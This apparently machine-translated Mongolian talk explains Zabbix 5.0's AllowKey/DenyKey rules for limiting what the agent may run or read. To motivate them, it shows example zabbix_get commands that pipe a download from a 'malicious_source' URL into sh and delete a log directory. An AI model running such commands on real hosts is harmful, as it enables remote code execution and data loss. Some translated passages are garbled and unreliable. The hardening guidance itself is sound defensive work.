Zabbix 5.0 дахь агент талын хэмжүүрүүдийн хар жагсаалт болон цагаан жагсаалтын дэмжлэг

Агент талын хэмжүүрүүдэд хар жагсаалт болон цагаан жагсаалтын дэмжлэг

Тихон Усков, Интеграцийн инженер, Zabbix

Өгөгдлийн аюулгүй байдлын асуудал

Zabbix 5.0 нь Zabbix Agent ашиглан системийн аюулгүй байдлыг сайжруулах боломжийг олгодог шинэ функцтэй бөгөөд хуучин параметрийг сольсон. RemoteCommands-г идэвхжүүл.

Агент дээр суурилсан системийн аюулгүй байдлын сайжруулалт нь агент нь олон тооны аюултай үйлдлүүдийг хийж чаддагтай холбоотой юм.

• Агент нь тохиргооны файлууд, лог файлууд, нууц үгийн файлууд болон бусад файлуудаас нууц эсвэл аюултай мэдээлэл зэрэг бараг бүх мэдээллийг цуглуулах боломжтой.

Жишээлбэл, zabbix_get хэрэглүүрийг ашигласнаар та хэрэглэгчдийн жагсаалт, тэдний гэрийн лавлах, нууц үгийн файл гэх мэт мэдээлэлд хандах боломжтой.

zabbix_get хэрэглүүрийг ашиглан өгөгдөлд хандах

ТАЙЛБАР:. Агент харгалзах файл дээр унших зөвшөөрөлтэй тохиолдолд л өгөгдлийг сэргээх боломжтой. Гэхдээ жишээ нь файл /etc/passwd/ бүх хэрэглэгчид унших боломжтой.

• Агент нь аюултай байж болзошгүй командуудыг гүйцэтгэх боломжтой. Жишээлбэл, түлхүүр *system.run[]** нь Zabbix вэб интерфэйсээс ажиллаж байгаа скриптүүд зэрэг сүлжээний зангилаанууд дээр ямар ч алсын тушаалуудыг гүйцэтгэх боломжийг олгодог.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Линукс дээр агент нь анхдагчаар root эрхгүй ажилладаг бол Windows дээр Системийн хэлбэрээр ажилладаг бөгөөд файлын системд хязгаарлалтгүй ханддаг. Үүний дагуу хэрэв суулгасны дараа Zabbix Agent-ийн параметрүүдэд өөрчлөлт ороогүй бол агент бүртгэл, файлын системд хандах эрхтэй бөгөөд WMI асуулга гүйцэтгэх боломжтой.

Өмнөх хувилбаруудад параметр EnableRemoteCommands=0 зөвхөн түлхүүрээр хэмжигдэхүүнийг идэвхгүй болгохыг зөвшөөрсөн *system.run[]** болон вэб интерфэйсээс скриптүүдийг ажиллуулж байсан боловч бие даасан файлуудад хандах хандалтыг хязгаарлах, агенттай суулгасан тусдаа түлхүүрүүдийг зөвшөөрөх, идэвхгүй болгох, эсвэл бие даасан параметрийн хэрэглээг хязгаарлах ямар ч арга байгаагүй.

Zabbix-ийн өмнөх хувилбаруудад EnableRemoteCommand параметрийг ашиглах

AllowKey/DenyKey

Zabbix 5.0 нь агент тал дээр хэмжигдэхүүнийг зөвшөөрөх, үгүйсгэх цагаан жагсаалт, хар жагсаалт гаргаж өгснөөр ийм зөвшөөрөлгүй хандалтаас хамгаалахад тусалдаг.

Zabbix 5.0-д бүх түлхүүрүүд, үүнд *system.run[]** идэвхжсэн бөгөөд агентын тохиргооны хоёр шинэ сонголт нэмэгдсэн:

AllowKey= - зөвшөөрөгдсөн шалгалт;

DenyKey = - хориглосон шалгалт;

Энд мета тэмдэгт (*) ашигладаг параметр бүхий гол нэрийн загвар байна.

AllowKey болон DenyKey товчлуурууд нь тодорхой загвар дээр үндэслэн бие даасан хэмжигдэхүүнийг зөвшөөрөх эсвэл үгүйсгэх боломжийг танд олгоно. Бусад тохиргооны параметрүүдээс ялгаатай нь AllowKey/DenyKey параметрүүдийн тоо хязгаарлагдахгүй. Энэ нь чекүүдийн модыг бий болгосноор агент системд яг юу хийж чадахыг тодорхой тодорхойлох боломжийг олгодог - гүйцэтгэх түлхүүрүүд, тэдгээрийн бичсэн дараалал нь маш чухал үүрэг гүйцэтгэдэг.

Дүрмүүдийн дараалал

Дүрмүүдийг тохиргооны файлд оруулсан дарааллаар нь шалгана. Түлхүүрийг эхний тохирлын өмнө дүрмийн дагуу шалгадаг бөгөөд өгөгдлийн элементийн түлхүүр нь загварт таарч ирмэгц зөвшөөрч эсвэл татгалздаг. Үүний дараа дүрэм шалгах ажиллагаа зогсч, үлдсэн түлхүүрүүдийг үл тоомсорлодог.

Тиймээс хэрэв элемент зөвшөөрөх ба үгүйсгэх дүрмийн аль алинд нь таарч байвал үр дүн нь тохиргооны файлд аль дүрэм эхнийх байхаас хамаарна.

Нэг загвар, түлхүүр бүхий 2 өөр дүрэм vfs.file.size[/tmp/file]

AllowKey/DenyKey товчлууруудыг ашиглах дараалал:

1. нарийн дүрэм,
2. ерөнхий дүрэм,
3. хориглох дүрэм.

Жишээлбэл, хэрэв танд тодорхой хавтсанд байгаа файлуудад хандах шаардлагатай бол эхлээд тэдгээрт хандахыг зөвшөөрч, дараа нь тогтоосон зөвшөөрөлд хамаарахгүй бусад бүх зүйлийг үгүйсгэх ёстой. Татгалзах дүрмийг эхлээд ашиглавал фолдерт хандах эрхийг хориглоно.

Зөв дараалал

Хэрэв та 2 хэрэгслийг *-ээр ажиллуулахыг зөвшөөрөх шаардлагатай болsystem.run[]**, мөн үгүйсгэх дүрмийг эхлээд зааж өгөх бөгөөд хэрэгслүүдийг эхлүүлэхгүй, учир нь эхний загвар нь ямар ч товчлууртай үргэлж таарч байх бөгөөд дараагийн дүрмийг үл тоомсорлох болно.

Буруу дараалал

Хээ

Үндсэн дүрэм

Загвар нь орлуулагч тэмдэг бүхий илэрхийлэл юм. Мета тэмдэгт (*) нь тодорхой байрлал дахь ямар ч тооны тэмдэгттэй таарч байна. Мета тэмдэгтүүдийг түлхүүр нэр болон параметрийн аль алинд нь ашиглаж болно. Жишээлбэл, та эхний параметрийг текстээр хатуу тодорхойлж болно. дараагийнхыг орлуулагч тэмдэг гэж зааж өгнө.

Параметрүүдийг дөрвөлжин хаалтанд [] оруулах ёстой.

• system.run[* - буруу
• vfs.file*.txt] - буруу
• vfs.file.*[*] - зөв

Оролцогч тэмдгийг ашиглах жишээ.

1. Түлхүүр нэр болон параметрт. Энэ тохиолдолд түлхүүр нь параметр агуулаагүй ижил төстэй түлхүүртэй тохирохгүй, учир нь бид түлхүүрийн нэрний тодорхой төгсгөл болон тодорхой параметрийн багцыг хүлээн авахыг хүсч байгаагаа загварт заасан болно.
2. Хэрэв загвар нь дөрвөлжин хаалт ашиглаагүй бол загвар нь параметр агуулаагүй бүх товчлуурыг зөвшөөрч, заасан параметрийг агуулсан бүх товчлуурыг үгүйсгэдэг.
3. Түлхүүрийг бүтнээр нь бичиж, параметрүүдийг орлуулах тэмдэгээр зааж өгсөн бол энэ нь ямар ч параметртэй ижил төстэй түлхүүртэй таарч, дөрвөлжин хаалтгүй түлхүүртэй таарахгүй, өөрөөр хэлбэл үүнийг зөвшөөрөх эсвэл үгүйсгэх болно.

Параметрүүдийг бөглөх дүрэм.

• Хэрэв параметр бүхий түлхүүрийг ашиглахаар төлөвлөж байгаа бол параметрүүдийг тохиргооны файлд зааж өгөх ёстой. Параметрүүдийг мета тэмдэгт болгон зааж өгөх ёстой. Аливаа файлд хандах хандалтыг болгоомжтой үгүйсгэж, хэмжигдэхүүн нь параметртэй болон параметргүй өөр өөр үсгийн дагуу ямар мэдээлэл өгч болохыг анхаарч үзэх шаардлагатай.

Параметр бүхий түлхүүр бичих онцлог

• Түлхүүрийг параметрүүдээр зааж өгсөн боловч параметрүүд нь сонголттой бөгөөд мета тэмдэгтээр тодорхойлогдсон бол параметргүй түлхүүр шийдэгдэх болно. Жишээлбэл, хэрэв та CPU-ийн ачааллын талаарх мэдээллийг хүлээн авахыг идэвхгүй болгож, system.cpu.load[*] товчлуурыг идэвхгүй болгохыг хүсвэл параметргүй товчлуур нь ачааллын дундаж утгыг буцаана гэдгийг бүү мартаарай.

Параметрүүдийг бөглөх дүрэм

Тэмдэглэл

тохируулга

• Зарим дүрмийг хэрэглэгч өөрчлөх боломжгүй, жишээлбэл, нээлтийн дүрэм эсвэл агент автомат бүртгэлийн дүрэм. AllowKey/DenyKey дүрмүүд нь дараах параметрүүдэд нөлөөлөхгүй:
  - Хост нэр
  - HostMetadataItem
  - HostInterfaceItem

ТАЙЛБАР:. Хэрэв администратор түлхүүрийг идэвхгүй болговол асуухад Zabbix энэ хэмжигдэхүүн эсвэл түлхүүр яагаад ' ангилалд багтах талаар мэдээлэл өгдөггүй.ДЭМЖИХГҮЙ БАЙНА'. Алсын тушаалыг гүйцэтгэхийг хориглох тухай мэдээлэл мөн агентийн бүртгэлийн файлд харагдахгүй байна. Энэ нь аюулгүй байдлын үүднээс хийгдсэн боловч хэмжүүрүүд ямар нэг шалтгаанаар дэмжигдээгүй ангилалд багтах тохиолдолд дибаг хийхэд хүндрэл учруулж болзошгүй..

• Та гадаад тохиргооны файлуудыг холбохдоо ямар нэгэн тодорхой дараалалд найдах ёсгүй (жишээлбэл, цагаан толгойн дарааллаар).

Тушаалын шугамын хэрэгслүүд

Дүрмүүдийг тохируулсны дараа та бүх зүйл зөв тохируулагдсан эсэхийг шалгах хэрэгтэй.

Та гурван сонголтын аль нэгийг ашиглаж болно:

• Zabbix-д хэмжүүр нэмнэ үү.
• -тэй тест хийнэ zabbix_agentd. Сонголттой Zabbix агент -хэвлэх (-p) тохиргоонд зөвшөөрөгдөөгүй бүх түлхүүрүүдийг (анхдагчаар зөвшөөрөгдсөн) харуулна. Мөн сонголттой -тест (-t) Учир нь хориотой түлхүүр буцаж ирэх болно.Дэмжигдээгүй зүйлийн түлхүүр'.
• -тэй тест хийнэ zabbix_get. Хэрэгсэл zabbix_get сонголттой -k буцаж ирнэ 'ZBX_NOTSUPPORTED: Үл мэдэгдэх хэмжүүр'.

Зөвшөөрөх эсвэл татгалзах

Та файлд хандахаас татгалзаж, жишээ нь уг хэрэгслийг ашиглан баталгаажуулах боломжтой zabbix_getэнэ файлд хандах эрхийг хориглосон.

**

ТАЙЛБАР:. Параметр дэх ишлэлийг үл тоомсорлодог.

Энэ тохиолдолд ийм файлд хандахыг өөр замаар зөвшөөрч болно. Жишээлбэл, хэрэв тэмдэгт холбоос нь түүнд хүргэдэг бол.

Заасан дүрмийг хэрэгжүүлэх янз бүрийн хувилбаруудыг шалгаж, хоригийг тойрч гарах боломжийг харгалзан үзэхийг зөвлөж байна.

Асуулт ба Хариулт

Таны асуулт. Яагаад дүрэм журам, зөвшөөрөл, хоригийг дүрслэхийн тулд өөрийн хэлтэй ийм нарийн төвөгтэй хэв маягийг сонгосон бэ? Жишээлбэл, Заббикс ашигладаг тогтмол хэллэгийг яагаад ашиглах боломжгүй байсан бэ?

Хариу хариул. Энэ нь ихэвчлэн нэг агент байдаг бөгөөд маш олон тооны хэмжүүрийг шалгадаг тул энэ нь regex гүйцэтгэлийн асуудал юм. Regex бол нэлээд хүнд ажиллагаа бөгөөд бид олон мянган хэмжигдэхүүнийг ингэж шалгаж чадахгүй. Wildcards - бүх нийтийн, өргөн хэрэглэгддэг, энгийн шийдэл.

Таны асуулт. Include файлууд цагаан толгойн үсгийн дарааллаар ороогүй байна уу?

Хариу хариул. Миний мэдэж байгаагаар, хэрэв та дүрмийг өөр өөр файлд тараавал дүрмийг ямар дарааллаар хэрэгжүүлэхийг урьдчилан таамаглах нь бараг боломжгүй юм. Би бүх AllowKey/DenyKey дүрмийг нэг Include файлд цуглуулахыг санал болгож байна, учир нь тэдгээр нь хоорондоо харилцан үйлчилдэг бөгөөд энэ файлыг багтаасан байдаг..

Таны асуулт. Zabbix 5.0-д сонголт 'EnableRemoteCommands=' тохиргооны файлд байхгүй бөгөөд зөвхөн AllowKey/DenyKey боломжтой юу?

Хариулт. Тиймээ зөв.

Таны анхаарлын төвд баярлалаа!

Эх сурвалж: www.habr.com